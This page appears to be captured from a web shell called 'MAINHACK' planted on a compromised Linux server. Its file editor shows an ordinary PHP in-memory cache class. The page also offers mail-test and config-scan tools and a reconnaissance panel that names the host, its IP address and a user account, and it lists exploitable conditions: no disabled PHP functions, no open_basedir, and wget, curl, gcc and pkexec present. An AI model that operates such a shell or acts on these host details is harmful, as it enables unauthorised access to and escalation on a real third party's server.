[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: InMemoryCache.php
<?php namespace Beste\Cache; use DateTimeImmutable; use Psr\Cache\CacheItemInterface; use Psr\Cache\CacheItemPoolInterface; use Psr\Clock\ClockInterface; final class InMemoryCache implements CacheItemPoolInterface { private readonly ClockInterface $clock; /** @var array<string, CacheItemInterface> */ private array $items; /** @var array<string, CacheItemInterface> */ private array $deferredItems; public function __construct( ?ClockInterface $clock = null, ) { $this->clock = $clock ?? new class implements ClockInterface { public function now(): DateTimeImmutable { return new DateTimeImmutable(); } }; $this->items = []; $this->deferredItems = []; } public function getItem(string $key): CacheItemInterface { $key = CacheKey::fromString($key); $item = $this->items[$key->toString()] ?? null; if ($item === null) { return new CacheItem($key, $this->clock); } return clone $item; } /** * @return iterable<CacheItemInterface> */ public function getItems(array $keys = []): iterable { if ($keys === []) { return []; } $items = []; foreach ($keys as $key) { $items[$key] = $this->getItem($key); } return $items; } public function hasItem(string $key): bool { return $this->getItem($key)->isHit(); } public function clear(): bool { $this->items = []; $this->deferredItems = []; return true; } public function deleteItem(string $key): bool { $key = CacheKey::fromString($key); unset($this->items[$key->toString()]); return true; } public function deleteItems(array $keys): bool { foreach ($keys as $key) { $this->deleteItem($key); } return true; } public function save(CacheItemInterface $item): bool { $this->items[$item->getKey()] = $item; return true; } public function saveDeferred(CacheItemInterface $item): bool { $this->deferredItems[$item->getKey()] = $item; return true; } public function commit(): bool { foreach ($this->deferredItems as $item) { $this->save($item); } $this->deferredItems = []; return true; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.77 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002